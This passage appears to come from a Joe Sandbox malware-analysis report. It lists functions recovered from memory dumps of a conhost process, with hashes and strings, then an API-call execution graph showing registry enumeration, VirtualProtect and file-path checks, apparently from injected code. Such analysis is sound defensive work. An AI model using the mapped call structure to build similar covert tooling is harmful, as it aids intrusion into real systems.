                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: b1514153aef62ca315ed7c40c8fc0d0d2239417e2ca0f8381ec919346d2afa2f
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: 65719136288B8193EB749E26995C3FE6BB4F3A5B84F440016FD4D53B89DE39C688C714
                                            Function 000001780D3E80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 1a602a6d344b00db337fad62cf6e5bc019b19ce986088ee0326cdceecaeaa0a8
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: CF51B232B59A008ADB54CF15E448BAD33B1E785B98F168525FA4E477C8FF79C889C720
                                            Function 000001780D3E9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000003.2868452616.000001780D3E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001780D3E0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_3_1780d3e0000_conhost.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 8d0505b4dd3317048630cab63e0b2482c825ef40fa27bf42a40dc112efe1ce15
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: C2615532508BC482EB619F15E4447DEB7A0F786B98F054215EB9C07BD9EF78D198CB20
                                            Function 000001780DD225DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: f6f2cbe89f01e824d33c65e706b527ad846c276d9327b88527becae4b251b7fb
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: A251BF3628C781D3EB249E25A45C3FE6A71F3A4790F440025FD5D43B99DE3DC4888B64
                                            Function 000001780DD32660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: c2c65543aca2a5b23b5bec896ba4387e000f3305eb369b243423ef63201ea7a7
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 51417A73A29A8086E7608F65E44D7DEA7B0F798784F844121FE4D87758EF38C489CB64
                                            Function 000001780DD29178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 55087f132a780ca5cc734f7aed302346290cb2103b175ee940950c93b27a908a
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 01111932258B8082EB658F15F45929DB7E5F798B94F584620EE8D07B64DF3CC595CB00
                                            Function 000001780DD21D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: ee4418879fc30c60d4f3c1a372d8db391ed6796b32bac89319f5f30c42b3b839
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 59116D36A45B84C6EB14CF66A80D2AD77B0F788FD0F588124EE4E53765EF38D5868340
                                            Function 000001780DD21264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 77b61339011b6d9b604be459f17e792b4fb30993665c2871c1583d59a9d3f81d
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: D5E03232A41A049BF7288F62E80D38936E1EB88B05F488024CD0907360EFBD84DD8BA0
                                            Function 000001780DD21000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000025.00000002.3071842190.000001780DD21000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001780DD20000, based on PE: true
                                            • Associated: 00000025.00000002.3071802745.000001780DD20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071885431.000001780DD35000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071926595.000001780DD40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3071966740.000001780DD42000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000025.00000002.3072006561.000001780DD49000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_37_2_1780dd20000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: 602b823c65a6f105dfc682687b74b8d00786c36ff7a8eb50206eb6a645ea7865
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: 65E0E572651A04ABF7289F62E80D29D76B1FB88B15F888064CD0907320EE7884DD9A20

                                            Execution Graph

                                            Execution Coverage:2.5%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:7.2%
                                            Total number of Nodes:1782
                                            Total number of Limit Nodes:28
                                            execution_graph 15773 20175eb5fcc 15774 20175eb5fd3 15773->15774 15775 20175eb6000 VirtualProtect 15774->15775 15777 20175eb5f10 15774->15777 15776 20175eb6029 GetLastError 15775->15776 15775->15777 15776->15777 18186 20175ec19d0 18189 20175ebe864 18186->18189 18190 20175ebe8b6 18189->18190 18191 20175ebe871 18189->18191 18195 20175ebcacc 18191->18195 18193 20175ebe8a0 18200 20175ebe53c 18193->18200 18196 20175ebcae8 FlsGetValue 18195->18196 18198 20175ebcae4 18195->18198 18196->18198 18197 20175ebcafe 18197->18193 18198->18197 18199 20175ebc940 _invalid_parameter_noinfo 13 API calls 18198->18199 18199->18197 18223 20175ebe7ac 18200->18223 18205 20175ebe58e 18205->18190 18206 20175ebc5d0 14 API calls 18207 20175ebe59f 18206->18207 18208 20175ebe5a7 18207->18208 18210 20175ebe5b6 18207->18210 18209 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18208->18209 18209->18205 18210->18210 18242 20175ebe8e0 18210->18242 18213 20175ebe6b2 18214 20175ebd1f4 __std_exception_copy 13 API calls 18213->18214 18216 20175ebe6b7 18214->18216 18215 20175ebe70d 18219 20175ebe774 18215->18219 18253 20175ebe05c 18215->18253 18217 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18216->18217 18217->18205 18218 20175ebe6cc 18218->18215 18220 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18218->18220 18222 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18219->18222 18220->18215 18222->18205 18224 20175ebe7cf 18223->18224 18230 20175ebe7d9 18224->18230 18268 20175ebc558 EnterCriticalSection 18224->18268 18229 20175ebe571 18235 20175ebe22c 18229->18235 18230->18229 18232 20175ebcacc 14 API calls 18230->18232 18233 20175ebe8a0 18232->18233 18234 20175ebe53c 56 API calls 18233->18234 18234->18229 18236 20175ebdd78 14 API calls 18235->18236 18237 20175ebe240 18236->18237 18238 20175ebe25e 18237->18238 18239 20175ebe24c GetOEMCP 18237->18239 18240 20175ebe273 18238->18240 18241 20175ebe263 GetACP 18238->18241 18239->18240 18240->18205 18240->18206 18241->18240 18243 20175ebe22c 16 API calls 18242->18243 18244 20175ebe91b 18243->18244 18246 20175ebe958 IsValidCodePage 18244->18246 18251 20175ebea71 18244->18251 18252 20175ebe972 18244->18252 18245 20175eb8070 _invalid_parameter_noinfo 8 API calls 18248 20175ebe6a9 18245->18248 18247 20175ebe969 18246->18247 18246->18251 18249 20175ebe998 GetCPInfo 18247->18249 18247->18252 18248->18213 18248->18218 18249->18251 18249->18252 18251->18245 18269 20175ebe344 18252->18269 18342 20175ebc558 EnterCriticalSection 18253->18342 18270 20175ebe38f GetCPInfo 18269->18270 18279 20175ebe485 18269->18279 18276 20175ebe3a2 18270->18276 18270->18279 18271 20175eb8070 _invalid_parameter_noinfo 8 API calls 18273 20175ebe524 18271->18273 18273->18251 18280 20175ec1474 18276->18280 18278 20175ec1938 33 API calls 18278->18279 18279->18271 18281 20175ebdd78 14 API calls 18280->18281 18282 20175ec14b6 18281->18282 18283 20175ebec58 MultiByteToWideChar 18282->18283 18284 20175ec14ec 18283->18284 18285 20175ec15b0 18284->18285 18286 20175ec14f3 18284->18286 18287 20175ebc5d0 14 API calls 18284->18287 18291 20175ec151c 18284->18291 18285->18286 18290 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18285->18290 18288 20175eb8070 _invalid_parameter_noinfo 8 API calls 18286->18288 18287->18291 18289 20175ebe419 18288->18289 18295 20175ec1938 18289->18295 18290->18286 18291->18285 18292 20175ebec58 MultiByteToWideChar 18291->18292 18293 20175ec1592 18292->18293 18293->18285 18294 20175ec1596 GetStringTypeW 18293->18294 18294->18285 18296 20175ebdd78 14 API calls 18295->18296 18297 20175ec195d 18296->18297 18300 20175ec1604 18297->18300 18301 20175ec1645 18300->18301 18302 20175ebec58 MultiByteToWideChar 18301->18302 18305 20175ec168f 18302->18305 18303 20175ec190d 18304 20175eb8070 _invalid_parameter_noinfo 8 API calls 18303->18304 18306 20175ebe44c 18304->18306 18305->18303 18307 20175ebc5d0 14 API calls 18305->18307 18309 20175ec16c7 18305->18309 18330 20175ec17c5 18305->18330 18306->18278 18307->18309 18308 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18308->18303 18310 20175ebec58 MultiByteToWideChar 18309->18310 18309->18330 18311 20175ec173a 18310->18311 18311->18330 18331 20175ebf218 18311->18331 18313 20175ec176d 18314 20175ec1785 18313->18314 18315 20175ec17d6 18313->18315 18313->18330 18317 20175ebf218 10 API calls 18314->18317 18314->18330 18316 20175ebc5d0 14 API calls 18315->18316 18318 20175ec18a8 18315->18318 18320 20175ec17f4 18315->18320 18316->18320 18317->18330 18319 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18318->18319 18318->18330 18319->18330 18321 20175ebf218 10 API calls 18320->18321 18320->18330 18322 20175ec1874 18321->18322 18322->18318 18323 20175ec18aa 18322->18323 18324 20175ec1894 18322->18324 18325 20175ebece8 WideCharToMultiByte 18323->18325 18326 20175ebece8 WideCharToMultiByte 18324->18326 18327 20175ec18a2 18325->18327 18326->18327 18327->18318 18328 20175ec18c2 18327->18328 18329 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18328->18329 18328->18330 18329->18330 18330->18303 18330->18308 18332 20175ebf244 18331->18332 18337 20175ebf267 18331->18337 18334 20175ebef88 9 API calls 18332->18334 18335 20175ebf26f 18332->18335 18334->18337 18335->18313 18336 20175ebf2cd LCMapStringW 18336->18335 18337->18335 18338 20175ebf30c 18337->18338 18339 20175ebf328 18338->18339 18340 20175ebf34a 18338->18340 18339->18340 18341 20175ebef88 9 API calls 18339->18341 18340->18336 18341->18340 15783 20175eb1bc4 15790 20175eb1724 GetProcessHeap HeapAlloc 15783->15790 15785 20175eb1bd3 15786 20175eb1bda Sleep 15785->15786 15789 20175eb159c StrCmpIW StrCmpW 15785->15789 15841 20175eb19b0 15785->15841 15787 20175eb1724 50 API calls 15786->15787 15787->15785 15789->15785 15858 20175eb1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15790->15858 15792 20175eb174c 15859 20175eb1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15792->15859 15794 20175eb1754 15860 20175eb1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15794->15860 15796 20175eb175d 15861 20175eb1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15796->15861 15798 20175eb1766 15862 20175eb1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15798->15862 15800 20175eb176f 15863 20175eb1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15800->15863 15802 20175eb1778 15864 20175eb1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15802->15864 15804 20175eb1781 15865 20175eb1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15804->15865 15806 20175eb178a RegOpenKeyExW 15807 20175eb17bc RegOpenKeyExW 15806->15807 15808 20175eb19a2 15806->15808 15809 20175eb17fb RegOpenKeyExW 15807->15809 15810 20175eb17e5 15807->15810 15808->15785 15812 20175eb181f 15809->15812 15813 20175eb1836 RegOpenKeyExW 15809->15813 15866 20175eb12b8 RegQueryInfoKeyW 15810->15866 15875 20175eb104c RegQueryInfoKeyW 15812->15875 15816 20175eb185a 15813->15816 15817 20175eb1871 RegOpenKeyExW 15813->15817 15821 20175eb12b8 16 API calls 15816->15821 15818 20175eb18ac RegOpenKeyExW 15817->15818 15819 20175eb1895 15817->15819 15824 20175eb18d0 15818->15824 15825 20175eb18e7 RegOpenKeyExW 15818->15825 15823 20175eb12b8 16 API calls 15819->15823 15822 20175eb1867 RegCloseKey 15821->15822 15822->15817 15826 20175eb18a2 RegCloseKey 15823->15826 15827 20175eb12b8 16 API calls 15824->15827 15828 20175eb190b 15825->15828 15829 20175eb1922 RegOpenKeyExW 15825->15829 15826->15818 15830 20175eb18dd RegCloseKey 15827->15830 15831 20175eb104c 6 API calls 15828->15831 15832 20175eb195d RegOpenKeyExW 15829->15832 15833 20175eb1946 15829->15833 15830->15825 15836 20175eb1918 RegCloseKey 15831->15836 15834 20175eb1981 15832->15834 15835 20175eb1998 RegCloseKey 15832->15835 15837 20175eb104c 6 API calls 15833->15837 15839 20175eb104c 6 API calls 15834->15839 15835->15808 15836->15829 15838 20175eb1953 RegCloseKey 15837->15838 15838->15832 15840 20175eb198e RegCloseKey 15839->15840 15840->15835 15885 20175eb14a0 15841->15885 15858->15792 15859->15794 15860->15796 15861->15798 15862->15800 15863->15802 15864->15804 15865->15806 15867 20175eb1323 GetProcessHeap HeapAlloc 15866->15867 15868 20175eb1486 RegCloseKey 15866->15868 15869 20175eb134e RegEnumValueW 15867->15869 15870 20175eb1472 GetProcessHeap HeapFree 15867->15870 15868->15809 15871 20175eb13a1 15869->15871 15870->15868 15871->15869 15871->15870 15873 20175eb141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 15871->15873 15874 20175eb13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15871->15874 15880 20175eb1530 15871->15880 15873->15871 15874->15873 15876 20175eb11b5 RegCloseKey 15875->15876 15878 20175eb10bf 15875->15878 15876->15813 15877 20175eb10cf RegEnumValueW 15877->15878 15878->15876 15878->15877 15879 20175eb114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 15878->15879 15879->15878 15883 20175eb154a 15880->15883 15884 20175eb1580 15880->15884 15881 20175eb1569 StrCmpW 15881->15883 15882 20175eb1561 StrCmpIW 15882->15883 15883->15881 15883->15882 15883->15884 15884->15871 15886 20175eb14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 15885->15886 15887 20175eb14c2 GetProcessHeap HeapFree 15885->15887 15887->15886 15887->15887 15888 20175ec47c2 15897 20175eb9978 15888->15897 15890 20175ec4814 __CxxCallCatchBlock 15908 20175eb9324 15890->15908 15893 20175ec4828 15894 20175eb9324 __CxxCallCatchBlock 9 API calls 15893->15894 15895 20175ec4838 15894->15895 15898 20175eb9324 __CxxCallCatchBlock 9 API calls 15897->15898 15899 20175eb998a 15898->15899 15900 20175eb99c5 15899->15900 15901 20175eb9324 __CxxCallCatchBlock 9 API calls 15899->15901 15902 20175eb9995 15901->15902 15902->15900 15903 20175eb9324 __CxxCallCatchBlock 9 API calls 15902->15903 15904 20175eb99b6 15903->15904 15904->15890 15905 20175eb8ff8 15904->15905 15906 20175eb9324 __CxxCallCatchBlock 9 API calls 15905->15906 15907 20175eb9006 15906->15907 15907->15890 15911 20175eb9340 15908->15911 15910 20175eb932d 15910->15893 15912 20175eb935f GetLastError 15911->15912 15913 20175eb9358 15911->15913 15923 20175eb9c8c 15912->15923 15913->15910 15927 20175eb9aac 15923->15927 15928 20175eb9b96 TlsGetValue 15927->15928 15933 20175eb9af0 __vcrt_InitializeCriticalSectionEx 15927->15933 15929 20175eb9b1e LoadLibraryExW 15930 20175eb9b3f GetLastError 15929->15930 15931 20175eb9bbd 15929->15931 15930->15933 15932 20175eb9bdd GetProcAddress 15931->15932 15934 20175eb9bd4 FreeLibrary 15931->15934 15932->15928 15933->15928 15933->15929 15933->15932 15935 20175eb9b61 LoadLibraryExW 15933->15935 15934->15932 15935->15931 15935->15933 18343 20175eb25dc 18344 20175eb265a 18343->18344 18345 20175eb26bf GetFileType 18344->18345 18351 20175eb2777 18344->18351 18346 20175eb26cd StrCpyW 18345->18346 18347 20175eb26e1 18345->18347 18352 20175eb26ee 18346->18352 18354 20175eb1ad4 GetFinalPathNameByHandleW 18347->18354 18349 20175eb3f88 StrCmpNIW 18349->18352 18352->18349 18352->18351 18359 20175eb3708 StrCmpIW 18352->18359 18363 20175eb1dd4 18352->18363 18355 20175eb1afe StrCmpNIW 18354->18355 18356 20175eb1b3d 18354->18356 18355->18356 18357 20175eb1b18 lstrlenW 18355->18357 18356->18352 18357->18356 18358 20175eb1b2a StrCpyW 18357->18358 18358->18356 18360 20175eb373a StrCpyW StrCatW 18359->18360 18361 20175eb3751 PathCombineW 18359->18361 18362 20175eb375a 18360->18362 18361->18362 18362->18352 18364 20175eb1deb 18363->18364 18365 20175eb1df4 18363->18365 18366 20175eb1530 2 API calls 18364->18366 18365->18352 18366->18365 16837 20175ec06e0 16838 20175ec06f9 16837->16838 16839 20175ec06e9 16837->16839 16840 20175ebd1f4 __std_exception_copy 13 API calls 16839->16840 16841 20175ec06ee 16840->16841 16842 20175ebd04c _invalid_parameter_noinfo 38 API calls 16841->16842 16842->16838 16853 20175ebf6dc 16854 20175ebf6e8 16853->16854 16855 20175ebf70f 16854->16855 16857 20175ec1c0c 16854->16857 16858 20175ec1c4c 16857->16858 16859 20175ec1c11 16857->16859 16858->16854 16860 20175ec1c32 DeleteCriticalSection 16859->16860 16861 20175ec1c44 16859->16861 16860->16860 16860->16861 16862 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16861->16862 16862->16858 18985 20175ebb0d4 18992 20175ebb007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 18985->18992 18986 20175ebb0fb 18987 20175eb9324 __CxxCallCatchBlock 9 API calls 18986->18987 18988 20175ebb100 18987->18988 18989 20175ebb10b __FrameHandler3::GetHandlerSearchState 18988->18989 18990 20175eb9324 __CxxCallCatchBlock 9 API calls 18988->18990 18990->18989 18991 20175eb99cc 9 API calls Is_bad_exception_allowed 18991->18992 18992->18986 18992->18989 18992->18991 18993 20175eb99f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 18992->18993 18993->18992 16867 20175eb2ed8 16869 20175eb2f35 16867->16869 16868 20175eb2f50 16869->16868 16870 20175eb38a8 3 API calls 16869->16870 16870->16868 18395 20175ebc1d8 18396 20175ebc209 18395->18396 18397 20175ebc1f1 18395->18397 18397->18396 18398 20175ebd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18397->18398 18398->18396 16871 20175ebaaac 16872 20175ebaad9 __except_validate_context_record 16871->16872 16873 20175eb9324 __CxxCallCatchBlock 9 API calls 16872->16873 16875 20175ebaade 16873->16875 16874 20175ebabe5 16885 20175ebac34 16874->16885 16886 20175ebab8c 16874->16886 16910 20175eb99e0 16874->16910 16876 20175ebabc6 16875->16876 16879 20175ebab38 16875->16879 16875->16886 16876->16874 16907 20175eb99cc 16876->16907 16878 20175ebabb3 16900 20175eb95d0 16878->16900 16879->16878 16880 20175ebab5a __GetCurrentState 16879->16880 16879->16886 16883 20175ebacdd 16880->16883 16888 20175ebafb8 16880->16888 16885->16886 16913 20175eba22c 16885->16913 16889 20175eb99cc Is_bad_exception_allowed 9 API calls 16888->16889 16890 20175ebafe7 __GetCurrentState 16889->16890 16891 20175eb9324 __CxxCallCatchBlock 9 API calls 16890->16891 16898 20175ebb004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 16891->16898 16892 20175ebb0fb 16893 20175eb9324 __CxxCallCatchBlock 9 API calls 16892->16893 16894 20175ebb100 16893->16894 16895 20175eb9324 __CxxCallCatchBlock 9 API calls 16894->16895 16896 20175ebb10b __FrameHandler3::GetHandlerSearchState 16894->16896 16895->16896 16896->16886 16897 20175eb99cc 9 API calls Is_bad_exception_allowed 16897->16898 16898->16892 16898->16896 16898->16897 16970 20175eb99f4 16898->16970 16973 20175eb9634 16900->16973 16902 20175eb95ef __FrameHandler3::ExecutionInCatch 16977 20175eb9540 16902->16977 16905 20175ebafb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 16906 20175eb9624 16905->16906 16906->16886 16908 20175eb9324 __CxxCallCatchBlock 9 API calls 16907->16908 16909 20175eb99d5 16908->16909 16909->16874 16911 20175eb9324 __CxxCallCatchBlock 9 API calls 16910->16911 16912 20175eb99e9 16911->16912 16912->16885 16981 20175ebb144 16913->16981 16915 20175eba6f4 16916 20175eba645 16916->16915 16956 20175eba643 16916->16956 17034 20175eba6fc 16916->17034 16917 20175eba373 16917->16916 16942 20175eba3ab 16917->16942 16919 20175eb9324 __CxxCallCatchBlock 9 API calls 16923 20175eba687 16919->16923 16920 20175eba575 16925 20175eba592 16920->16925 16927 20175eb99cc Is_bad_exception_allowed 9 API calls 16920->16927 16920->16956 16921 20175eb9324 __CxxCallCatchBlock 9 API calls 16924 20175eba2da 16921->16924 16923->16915 16926 20175eb8070 _invalid_parameter_noinfo 8 API calls 16923->16926 16924->16923 16928 20175eb9324 __CxxCallCatchBlock 9 API calls 16924->16928 16932 20175eba5b4 16925->16932 16925->16956 17027 20175eb95a4 16925->17027 16929 20175eba69a 16926->16929 16927->16925 16931 20175eba2ea 16928->16931 16929->16886 16933 20175eb9324 __CxxCallCatchBlock 9 API calls 16931->16933 16934 20175eba5ca 16932->16934 16932->16956 16967 20175eba6d7 16932->16967 16935 20175eba2f3 16933->16935 16936 20175eba5d5 16934->16936 16939 20175eb99cc Is_bad_exception_allowed 9 API calls 16934->16939 16992 20175eb9a0c 16935->16992 16944 20175ebb1dc 9 API calls 16936->16944 16937 20175eb9324 __CxxCallCatchBlock 9 API calls 16940 20175eba6dd 16937->16940 16939->16936 16943 20175eb9324 __CxxCallCatchBlock 9 API calls 16940->16943 16942->16920 16953 20175eb99e0 9 API calls 16942->16953 17006 20175eba96c 16942->17006 17020 20175eba158 16942->17020 16947 20175eba6e6 16943->16947 16945 20175eba5eb 16944->16945 16950 20175eb9634 __SetUnwindTryBlock RtlLookupFunctionEntry 16945->16950 16945->16956 16946 20175eb9324 __CxxCallCatchBlock 9 API calls 16948 20175eba335 16946->16948 16949 20175ebc2f4 14 API calls 16947->16949 16948->16917 16952 20175eb9324 